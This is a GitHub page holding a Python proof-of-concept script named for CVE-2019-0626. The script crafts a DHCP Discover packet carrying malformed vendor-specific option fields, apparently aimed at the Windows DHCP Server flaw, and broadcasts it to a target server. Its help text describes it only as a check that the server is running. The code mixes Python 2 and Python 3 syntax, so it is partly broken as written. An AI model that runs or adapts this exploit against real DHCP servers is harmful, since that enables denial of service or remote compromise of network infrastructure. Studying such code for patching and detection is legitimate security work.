-
Notifications
You must be signed in to change notification settings - Fork 19
/
CVE-2019-0626.py
98 lines (82 loc) · 3.75 KB
/
CVE-2019-0626.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
#!/usr/bin/python3
# -*- coding: UTF-8 -*-
import os
import sys
import argparse
from time import time
import re
import socket
import struct
from uuid import getnode
from random import randint
DHCP_SERVER_PORT = 67
DHCP_CLIENT_PORT = 68
DEFAULT_DHCP_SERVER_ADDRESS = '255.255.255.255'
WAIT_TIMEOUT = 10
class DHCPDiscover:
def __init__(self):
self.transactionID = b''
for i in range(4):
t = randint(0, 255)
self.transactionID += struct.pack('!B', t)
def buildPacket(self, mac_address):
mac_bytes = b''
for i in range(0, 12, 2) :
mac_bytes += struct.pack('!B', int(mac_address[i:i + 2], 16))
packet = b''
packet += b'\x01' #Message type: Boot Request (1)
packet += b'\x01' #Hardware type: Ethernet
packet += b'\x06' #Hardware address length: 6
packet += b'\x00' #Hops: 0
packet += self.transactionID #Transaction ID
packet += b'\x00\x00' #Seconds elapsed: 0
packet += b'\x80\x00' #Bootp flags: 0x8000 (Broadcast) + reserved flags
packet += b'\x00\x00\x00\x00' #Client IP address: 0.0.0.0
packet += b'\x00\x00\x00\x00' #My (client) IP address: 0.0.0.0
packet += b'\x00\x00\x00\x00' #Next server IP address: 0.0.0.0
packet += b'\x00\x00\x00\x00' #Relay agent IP address: 0.0.0.0
packet += mac_bytes #Client MAC address
packet += b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' #Client hardware address padding: 00000000000000000000
packet += b'\x00' * 67 #Server host name (empty)
packet += b'\x00' * 125 #Boot file name (empty)
packet += b'\x63\x82\x53\x63' #Magic cookie: DHCP
packet += b'\x35\x01\x01' #Option: (t=53,l=1) DHCP Message Type = DHCP Discover
packet += b'\x3d\x06' + mac_bytes #Option: (t=61,l=6) Client identifier
packet += b'\x37\x03\x03\x01\x06' #Option: (t=55,l=3) Parameter Request List
packet += b'\x2b\x0a\x12\x12\x12\x12\x12\x12\x12\x12\x12\x12'
packet += b'\x2b\x0f\x12\x12\x12\x12\x12\x12\x12\x12\x12\x12'
packet += b'\xff' #End Option
prstring ="\\x"
for i in range(0,len(packet)):
prstring=prstring+packet[i].encode('hex')
prstring=prstring+"\\x"
print prstring
return packet
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='send a DHCP request to DHCP server to see if it\'s up and running')
parser.add_argument('-m', action='store', dest='mac_address', help='MAC address. Default the MAC of this host')
parser.add_argument('-s', action='store', dest='dhcp_server_address', help='DHCP Server address. Default %s'%DEFAULT_DHCP_SERVER_ADDRESS)
args = parser.parse_args()
if(args.mac_address) :
my_mac_address = re.sub(':', '', args.mac_address)
else :
my_mac_address = str(hex(getnode()))[2:]
#print my_mac_address
if(args.dhcp_server_address) :
dhcp_server_address = args.dhcp_server_address
else :
dhcp_server_address = DEFAULT_DHCP_SERVER_ADDRESS
start_time = time()
dhcp_client = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
dhcp_client.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
dhcp_client.settimeout(WAIT_TIMEOUT)
try:
dhcp_client.bind(('', DHCP_CLIENT_PORT))
except Exception as e:
dhcp_client.close()
exit('Can\'t bind dhcp client port %d '%DHCP_CLIENT_PORT)
discoverPacket = DHCPDiscover()
dhcp_client.sendto(discoverPacket.buildPacket(my_mac_address), (dhcp_server_address, DHCP_SERVER_PORT))
print('DHCP Discover sent to %s\nwaiting for reply...'%dhcp_server_address)
dhcp_client.close()
exit(0)